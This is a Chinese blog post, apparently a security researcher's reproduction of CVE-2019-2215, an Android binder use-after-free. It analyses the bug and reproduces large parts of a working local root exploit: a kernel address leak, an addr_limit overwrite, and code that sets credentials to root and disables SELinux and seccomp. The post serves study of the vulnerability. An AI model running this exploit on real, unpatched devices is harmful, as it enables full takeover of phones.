CVE-2019-2215复现过程记录

CVE-2019-2215复现过程记录
2021-03-16 21:50:26 Author: xz.aliyun.com(查看原文) 阅读量:265 收藏

CVE-2019-2215

信息收集

360安全响应-安卓本地提权漏洞预警
bugs.chromium project-zero email，project zero的公开邮件
Project Zero博客，对漏洞成因和利用细节有详细说明
linux各版本源码，用来找各变量类型间的定义比较方便，但其中对于结构体和各类定义都比较老，这部分代码参考其他来源比较好

复现环境

pixel 2
Android 9
内核4.4.169-gee9976dde895

poc

编译poc

google 下载ndk最新版本

使用命令编译

$ ndk/<ndk版本号>/toolchains/llvm/prebuilt/<ndk工具平台>/bin/aarch64-linux-android28-clang -o poc poc.c

poc.c

来源：https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

只包含main的简短的poc用于触发漏洞，展示了内核存在的漏洞点。在未补丁的系统上运行有可能导致内核崩溃

poc2.c

来源：https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

利用该漏洞进行内核任意地址读写。该poc运行后的uname -a输出中可以看到EXPLOITED KERNEL

poc3.c

来源：https://hernan.de/blog/tailoring-cve-2019-2215-to-achieve-root/

利用该漏洞进行本地提权

漏洞分析

漏洞描述

漏洞成因：使用了epoll的进程在调用BINDER_THREAD_EXIT结束binder线程时会释放binder_thread结构体，然后在程序退出或调用EPOLL_CTL_DEL时会遍历已释放结构体binder_thread中的wait链表进行链表删除操作。
问题在于，当程序退出或调用epoll的清理操作时，此时访问的wait链表位于已释放的binder_thread结构体中，uaf产生。如果在binder_thread释放后手动申请内存占位，那么在程序访问到wait链表时就会在手动申请的内存中操作，从而泄露信息。利用这些信息可以进一步达到内核任意地址读写甚至提权等操作。

结构体定义和uaf过程

binder_thread结构体，是导致uaf的关键结构体：

//https://android.googlesource.com/kernel/msm/+/550c01d0e051461437d6e9d72f573759e7bc5047/drivers/android/binder.c#615
struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        //uaf point (offset 0xA0)
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        //root point (offset 0x190)
        struct task_struct *task;
};

poc.c的代码，触发漏洞的过程：

//poc.c
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul
int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };
        fd = open("/dev/binder0", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

KASAN的crash输出（部分省略）：

//https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414028
[  464.504637] c0   3033 ==================================================================
[  464.504747] c0   3033 BUG: KASAN: use-after-free in remove_wait_queue+0x48/0x90
[  464.511836] c0   3033 Write of size 8 at addr 0000000000000000 by task new.out/3033
[  464.518893] c0   3033
[  464.526548] c0   3033 CPU: 0 PID: 3033 Comm: new.out Tainted: G         C      4.4.177-ga9e0ec5cb774 #1
[  464.529044] c0   3033 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
[  464.538334] c0   3033 Call trace:
[  464.545928] c0   3033 [<ffffff900808f0e8>] dump_backtrace+0x0/0x34c
[  464.549328] c0   3033 [<ffffff900808f574>] show_stack+0x1c/0x24
[  464.555411] c0   3033 [<ffffff900858bcc8>] dump_stack+0xb8/0xe8
[  464.561319] c0   3033 [<ffffff90082b1ecc>] print_address_description+0x94/0x334
[  464.567219] c0   3033 [<ffffff90082b23f0>] kasan_report+0x1f8/0x340
[  464.574501] c0   3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[  464.580753] c0   3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[  464.587125] c0   3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[  464.593617] c0   3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[  464.601149] c0   3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[  464.606988] c0   3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[  464.613724] c0   3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[  464.619463] c0   3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[  464.625193] c0   3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[  464.631260] c0   3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[  464.637167] c0   3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[  464.643421] c0   3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  464.649944] c0   3033
[  464.655899] c0   3033 Allocated by task 3033:
[  464.658257]  [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[  464.663899]  [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[  464.669882]  [<ffffff90082b0b14>] kasan_kmalloc.part.5+0x50/0x124
[  464.675528]  [<ffffff90082b0e38>] kasan_kmalloc+0xc4/0xe4
[  464.681597]  [<ffffff90082ac8a4>] kmem_cache_alloc_trace+0x12c/0x240
[  464.686992]  [<ffffff90094093c0>] binder_get_thread+0xdc/0x384
[  464.693319]  [<ffffff900940969c>] binder_poll+0x34/0x1bc
[  464.699127]  [<ffffff900833839c>] SyS_epoll_ctl+0x704/0xf84
[  464.704423]  [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  464.709971] c0   3033
[  464.714124] c0   3033 Freed by task 3033:
[  464.716396]  [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[  464.721699]  [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[  464.727678]  [<ffffff90082b16a4>] kasan_slab_free+0xb0/0x1c0
[  464.733322]  [<ffffff90082ae214>] kfree+0x8c/0x2b4
[  464.738952]  [<ffffff900940ac00>] binder_thread_dec_tmpref+0x15c/0x1c0
[  464.743750]  [<ffffff900940d590>] binder_thread_release+0x284/0x2e0
[  464.750253]  [<ffffff90094149e0>] binder_ioctl+0x6f4/0x3664
[  464.756498]  [<ffffff90082e1364>] do_vfs_ioctl+0x7f0/0xd58
[  464.762052]  [<ffffff90082e1968>] SyS_ioctl+0x9c/0xc0
[  464.767513]  [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
------------------------------ ... ... -----------------------------------
[  465.201706] c0   3033 Call trace:
------------------------------ ... ... -----------------------------------
[  465.298084] c0   3033 [<ffffff90082b1ddc>] kasan_end_report+0x38/0x3c
[  465.306712] c0   3033 [<ffffff90082b22e4>] kasan_report+0xec/0x340
[  465.313308] c0   3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[  465.319390] c0   3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[  465.325581] c0   3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[  465.332075] c0   3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[  465.339607] c0   3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[  465.345437] c0   3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[  465.352183] c0   3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[  465.357920] c0   3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[  465.363643] c0   3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[  465.369711] c0   3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[  465.375617] c0   3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[  465.381882] c0   3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  465.388494] c0   3033 Code: f9400261 f00124e0 91000000 945d2daa (d4210000)
[  465.394428] c0   3033 ---[ end trace 3129689a85316455 ]---

尝试根据kasan的输出寻找引发内核崩溃的一系列调用：

epoll_ctl调用后申请了binder_thread结构，binder_thread结构申请的过程在Allocated by task(27行)中
随后在ioctl调用过程中释放了binder_thread结构体，过程在Freed by task(38行)中从SyS_ioctl(47行)到kfree(42行)
目前来看程序在正常运行，但在程序结束即将退出时触发了crash，Call trace(50行)处报告了crash时的调用栈
以调用顺序由下往上看，ep_eventpoll_release(58行)之前是系统退出时的相关调用，从ep_eventpoll_release往上到remove_wait_queue是程序结束后epoll相关的清理工作，也就是说在remove_wait_queue调用后导致了crash

remove_wait_queue中，参数wq_head就是binder_thread中的wait成员

//https://code.woboq.org/linux/linux/kernel/sched/wait.c.html#39
void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
  unsigned long flags;
  spin_lock_irqsave(&wq_head->lock, flags);
  __remove_wait_queue(wq_head, wq_entry);
  spin_unlock_irqrestore(&wq_head->lock, flags);
}

由于binder_thread释放后，其中的成员wait（指向wait_queue_head的指针）没有删除，导致wait指向的是一片被释放的内存，所以在程序退出时调用到remove_wait_queue中的spin_lock_irqsave对wait成员的自旋锁检查时出现了错误

漏洞利用——任意地址写

main

int epfd;

void *dummy_page_4g_aligned;
unsigned long current_ptr;
int binder_fd;
int kernel_rw_pipe[2];

int main(void) {
  printf("Starting POC\n");
  //pin_to(0);

  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (dummy_page_4g_aligned != (void*)0x100000000UL)
    err(1, "mmap 4g aligned");
  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");

  binder_fd = open("/dev/binder", O_RDONLY);
  epfd = epoll_create(1000);
  leak_task_struct();
  clobber_addr_limit();

  setbuf(stdout, NULL);
  printf("should have stable kernel R/W now\n");
 ......
}

申请了一段大小0x2000的内存，赋值给了全局变量dummy_page_4g_aligned。这段内存在后面构造数据时会用到，作用是绕过spin_lock_irqsave检查。
打开"/dev/binder"，进行epoll_create操作，和poc.c中开始的操作一样，用于epoll的初始化
调用leak_task_struct泄露task_struct地址
调用clobber_addr_limit覆盖addr_limit实现内核任意地址读写
后面的操作就是利用得到的任意地址读写能力修改系统属性

主要关注点在leak_task_struct和clobber_addr_limit这两个函数，逐个分析

泄露task_struct pointer

为了利用uaf，需要先用writev重新申请到binder_thread释放的空间，通过EPOLL_CTL_DEL调用remove_wait_queue将wait的地址泄露到之前申请的内存中。由于task_struct和wait都位于binder_thread中，所以计算偏移后就能得到task_struct的指针

利用writev申请到内核空间

学习：readv和writev函数

调用writev会经过rw_copy_check_uvector检查writev第二个参数struct iovec指针中的每一项是否位于用户空间中，检查通过后会将writev第二个参数复制到内核空间，并且就算之后iov_base不再指向用户空间也不会再检查。利用这两个特点，可以构造iovec结构体数组的大小与binder_thread相同或相近，复制时就有很大可能申请到binder_thread释放后的那块内存，然后利用rw_copy_check_uvector只检查一次的特性，泄露内核地址后可以读取内核空间的数据。
通过remove_wait_queue泄露wait地址

epoll在执行EPOLL_CTL_DEL时会调用remove_wait_queue清理wait链表，通过构造iovec结构体中的数据绕过spin_lock_irqsave检查后，进入到__remove_wait_queue函数中，相关函数如下：
```
static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
    list_del(&old->task_list);
}
static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}
```
可以看到调用链：__remove_wait_queue -> list_del -> __list_del

list_del的参数entry就是待删除的task_list，经过了__list_del函数的操作后，entry指向的task_list就从wait链表中取出了，过程如图：

而如果wait链表中只存在一项时（也就是head），就会变成这样：

此时prev和next指向了head自身，而head本身又是位于我们申请的binder_thread内存中，所以p和n泄露出了head的地址，也就是binder_thread中wait成员的地址。

现在可以来分析poc了：

// size of struct binder_thread : 408Bytes = 0x198
#define BINDER_THREAD_SZ 0x190
// use struct iovec to refill the freed binder_thread
// size of struct iovec is 16Bytes (64bit system)
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25

// offset of wait_queue in binder_thread
#define WAITQUEUE_OFFSET 0xA0

// finger out offset of wait_queue in iovec array
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

void leak_task_struct(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

  int b;
  int pipefd[2];
  if (pipe(pipefd)) err(1, "pipe");
  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
  static char page_buffer[0x1000];
  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    // first page: dummy data
    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
    close(pipefd[1]);
    printf("CHILD: Finished write to FIFO.\n");

    exit(0);
  }
  //printf("PARENT: Calling READV\n");
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
  printf("writev() returns 0x%x\n", (unsigned int)b);
  // second page: leaked data
  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

  printf("PARENT: Finished calling READV\n");
  int status;
  if (wait(&status) != fork_ret) err(1, "wait");

  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
  printf("current_ptr == 0x%lx\n", current_ptr);
}

进行EPOLL_CTL_ADD，添加对binder_fd的监听事件，同poc.c
初始化iovec_array，并填充构造数据
创建pipe并设定好buffer，用于之后父子进程通信
fork生成子进程，子进程一开始sleep了两秒，所以继续看父进程
进行BINDER_THREAD_EXIT，此时binder_thread结构体已被释放
父进程调用writev（因为writev的特性，binder_thread被free的内存由iovce_array[IOVEC_ARRAY_SZ]占位），从iovec_array读取数据写入pipefd[1]，根据iovec_array构造的数据可知，从iovec_array[9]及以前的内容都为0，所以writev从iovec_array[10]开始读取，也就是将dummy_page_4g_aligned指向的0x1000大小的无用数据写入管道中，由于管道大小也为0x1000所以writev阻塞，此时转到子进程
由于binder_thread已被构造的数据占位，所以目前内存中的情况如下：

| binder_thread struct | iovec_array |
| ------------------------- | ------------------------------------------------------ |
| 0x00: ... | 0x00: iovec_array[0].iov_len |
| 0x08: ... | 0x08: iovec_array[0].iov_base |
| ... | ... |
| ... | ... |
| 0xA0: wait.lock | 0xA0: iovec_array[10].iov_base (dummy_page_4g_aligned) |
| 0xA8: wait.task_list.next | 0xA8: iovec_array[10].iov_len (0x1000) |
| 0xB0: wait.task_list.prev | 0xB0: iovec_array[11].iov_base (0xDEADBEEF) |
| 0xB8: ... | 0xB8: iovec_array[11].iov_len (0x1000) |
| ... | ... |
| ... | ... |
此时子进程调用EPOLL_CTL_DEL触发uaf，进入remove_wait_queue后dummy_page_4g_aligned绕过了自旋锁检查，进行删除链表项的操作时wait.task_list.next和wait.task_list.prev都指向自身(wait.task_list)，所以现在iovec_array[10].iov_len和iovec_array[11].iov_base都保存了泄露的地址
然后子进程进行read操作，将刚才父进程写入的无用数据读出以解除父进程的阻塞状态，子进程结束，转到父进程
父进程继续未完成的writev函数，将iovec_array[11].iov_base指向的0x1000大小的数据写入管道，而此时iovec_array[11].iov_base的数据已经在子进程中被覆盖为了泄露的wait地址，所以此时读取的是wait结构体之后的数据
调用read函数，将读取到的数据保存到page_buffer中
根据task_struct在binder_thread中的偏移，计算出task_struct的地址，保存在current_ptr中，函数结束

泄露过程:

覆盖addr_limit

直接开始分析：

void clobber_addr_limit(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  unsigned long second_write_chunk[] = {
    1, /* iov_len */
    0xdeadbeef, /* iov_base (already used) */
    0x8 + 2 * 0x10, /* iov_len (already used) */
    current_ptr + 0x8, /* next iov_base (addr_limit) */
    8, /* next iov_len (sizeof(addr_limit)) */
    0xfffffffffffffffe /* value to write */
  };

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
      err(1, "write second chunk to socket");
    exit(0);
  }
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  struct msghdr msg = {
    .msg_iov = iovec_array,
    .msg_iovlen = IOVEC_ARRAY_SZ
  };
  printf("PARENT: Doing recvmsg.\n");
  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
  printf("PARENT recvmsg() returns %d, expected %lu\n", recvmsg_result,
      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
}

进行EPOLL_CTL_ADD，相同的操作
初始化iovec_array，构造数据
初始化second_write_chunk，构造数据
socketpair初始化socket，并向socks[1]写入1字节

学习：socketpair、recvmsg
fork生成子进程，sleep(2)，看父进程
进行BINDER_THREAD_EXIT，此时binder_thread结构体已被释放
调用recvmsg，读取之前写入socket的1字节，此时为第一次读取（recvmsg#1）

recvmsg和writev都可以将用户空间的数据复制到内核空间，所以调用recvmsg时binder_thread的内存被占位
socket中没有更多数据可读取，此时父进程阻塞，转到子进程
子进程调用EPOLL_CTL_DEL触发uaf，与之前的情况一样，iovec_array[10].iov_len和iovec_array[11].iov_base被改写为wait.task_list地址
子进程调用write向socket写入second_write_chunk，此时socket中存在数据，父进程解除阻塞状态，子进程结束，转到父进程
父进程根据iovec_array[11].iov_len读取0x28大小的数据到iovec_array[11].iov_base中，此时为第二次读取（recvmsg#2）

由于second_write_chunk大小为0x30，所以recvmsg还要再读取8字节数据，也就是second_write_chunk最后8字节0xfffffffffffffffe，而此时iovec_array[12].iov_base已经在recvmsg#2操作中被覆盖为current_ptr + 0x8也就是task_struct + 0x8，这个地址即addr_limit的地址，所以在recvmsg#3读取后，addr_limit被覆盖为0xfffffffffffffffe，得到了任意地址读写的权限，函数结束

// elixir.bootlin.com/linux/v5.5.19/source/include/linux/sched.h#L635
// 链接中的linux版本高于测试机版本4.4.169是由于此网站的结构体定义普遍偏旧，在4.4版本中找不到相应的结构体定义，该版本的结构体定义符合测试机版本
struct task_struct {
    #ifdef CONFIG_THREAD_INFO_IN_TASK
    /*
       * For reasons of header soup (see current_thread_info()), this
       * must be the first element of task_struct.
       */
    struct thread_info thread_info;
    #endif
    volatile long state;  /* -1 unrunnable, 0 runnable, >0 stopped */
    void *stack;
    atomic_t usage;
    unsigned int flags;   /* per process flags, defined below */
    unsigned int ptrace;
    ......
}
//elixir.bootlin.com/linux/v5.5.19/source/arch/arm64/include/asm/thread_info.h#L26
struct thread_info {
    unsigned long     flags;      /* low level flags */
    mm_segment_t      addr_limit; /* address limit */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
    struct task_struct    *task;      /* main task structure */
    #endif
    #ifdef CONFIG_ARM64_SW_TTBR0_PAN
    u64           ttbr0;      /* saved TTBR0_EL1 */
    #endif
    int           preempt_count;  /* 0 => preemptable, <0 => bug */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
    int           cpu;        /* cpu */
    #endif
};

覆盖过程：

修改系统属性

修改内核内存中的数据首先要得到内核基址和内核符号信息，后者用来计算偏移。获取内核符号信息可以通过下载googlesource中的官方镜像然后用工具提取，也可以用已root的同型号同内核版本手机dump出内核信息来获取。以下采用的是通过官方镜像提取的办法。

内核符号信息

根据poc3.c wp提供的方法，获取符号信息过程如下：

google测试机内核版本，本测试机为4.4.169-gee9976dde895，搜索结果中找到wahoo-kernel repo，下载文件Image.lz4-dtb（右下角的txt下载，base64解码得到原文件，记得改后缀）

解压下载的文件

$ lz4 -d Image.lz4-dtb Image
Stream followed by unrecognized data
Successfully decoded 37500928 bytes
$ strings Image | grep "Linux version"
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019

使用droidimg导出符号表，可能会遇到下面的报错：在寻找kallsyms table时出错

$ ./vmlinux.py Image
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
[+]kallsyms_arch = arm64
[!]could be offset table...
[!]lookup_address_table error...
[!]get kallsyms error...

用droidimg中的工具修复Image

$ gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c
fix_kaslr_arm64.c:269:5: warning: always_inline function might not be inlinable [-Wattributes]
 int main(int argc, char **argv)
     ^~~~
$ ./fix_kaslr_arm64 Image Image_kaslr
Origiellnal kernel: Image, output file: Image_kaslr
kern_buf @ 0x7f7eb403c000, mmap_size = 37502976
rela_start = 0xffffff8009916430
p->info = 0x0sh
rela_end = 0xffffff800a1b0340
375847 entries processed

最后导出符号表

$ ./vmlinux.py Image_kaslr > syms.txt
Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
[+]kallsyms_arch = arm64
[+]numsyms: 131300
[+]kallsyms_address_table = 0x11eb300
[+]kallsyms_num = 131300 (131300)
[+]kallsyms_name_table = 0x12ebc00
[+]kallsyms_type_table = 0x0
[+]kallsyms_marker_table = 0x14a4a00
[+]kallsyms_token_table = 0x14a5b00
[+]kallsyms_token_index_table = 0x14a5f00
[+]kallsyms_start_address = 0xffffff8008080000L
[+]found 9917 symbols in ksymta

根据导出符号表的地址和基址(kallsyms_start_address = 0xffffff8008080000L)计算偏移

内核基址

有了符号表偏移后要计算基址只需泄露出某个符号的地址再减去符号表中该符号的偏移即可。

poc2.c中的做法是找：task_struct->mm->user_ns地址，减去init_user_ns偏移。

修改属性

直接用基址+偏移的方式找到系统属性的地址再修改即可

漏洞利用——提权

poc3.c中，escalate函数利用之前获得的内核读写权限进行提权。为了得到full root即完整root权限，需要绕过linux中多个安全机制（这里仅提出所绕过安全机制的类型，并不对机制做详细解释），不过有了内核读写权限后绕过也不是特别麻烦。权部分代码（其中DEBUG_RW用于打印额外信息帮助理解）：

void escalate()
{
  ......

  uid_t uid = getuid();
  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
  // offset 0x78 is pointer to void * security
  unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78);

  printf("current->cred == 0x%lx\n", my_cred);

  printf("Starting as uid %u\n", uid);
  printf("Escalating...\n");

  // change IDs to root (there are eight)
  for (int i = 0; i < 8; i++)
    kernel_write_uint(my_cred+4 + i*4, 0);

  if (getuid() != 0) {
    printf("Something went wrong changing our UID to root!\n");
    exit(1);
  }

  printf("UIDs changed to root!\n");

  // reset securebits
  kernel_write_uint(my_cred+0x24, 0);

  // change capabilities to everything (perm, effective, bounding)
  for (int i = 0; i < 3; i++)
    kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);

  printf("Capabilities set to ALL\n");

  // Grant: was checking for this earlier, but it's not set, so I moved on
  // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0));

  unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);

  printf("SELinux status = %u\n", enforcing);

  if (enforcing) {
    printf("Setting SELinux to permissive\n");
    kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
  } else {
    printf("SELinux is already in permissive mode\n");
  }

  // Grant: We want to be as powerful as init, which includes mounting in the global namespace
  printf("Re-joining the init mount namespace...\n");
  int fd = open("/proc/1/ns/mnt", O_RDONLY);

  if (fd < 0) {
    perror("open");
    exit(1);
  }

  if (setns(fd, CLONE_NEWNS) < 0) {
    perror("setns");
    exit(1);
  }

  printf("Re-joining the init net namespace...\n");

  fd = open("/proc/1/ns/net", O_RDONLY);

  if (fd < 0) {
    perror("open");
    exit(1);
  }

  if (setns(fd, CLONE_NEWNET) < 0) {
    perror("setns");
    exit(1);
  }

  // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
  if (prctl(PR_GET_SECCOMP) != 0) {
    printf("Disabling SECCOMP\n");

    // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN
    // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
    // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
    kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0);

    if (prctl(PR_GET_SECCOMP) != 0) {
      printf("Failed to disable SECCOMP!\n");
      exit(1);
    } else {
      printf("SECCOMP disabled!\n");
    }
  } else {
    printf("SECCOMP is already disabled!\n");
  }

  // Grant: At this point, we are free from our jail (if all went well)
}

DAC

Discretionary Access Control——自由访问控制

获取内核读写权限的过程中我们得到了task_struct的指针，而task_struct是linux内核中被称为进程描述符的结构体，它包含了一个进程中的各种信息，其中的成员变量cred是和该进程权限有关的结构体，定义如下：

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
} __randomize_layout;

escalate中首先通过基址加偏移得到cred地址，然后将该结构体中的uid到fsgid修改为0，提权为root。虽然此时已经成为root，但是由于其他linux安全机制的存在，现在的root并没有获得完全的系统控制权，因此后面还修改了其他值。

CAP

Linux Capabilities——Linux能力

CAP对应在cred中kernel_cap_t类型的成员变量

MAC

Mandatory Access Control——强制访问控制

MAC在此处指SELinux。

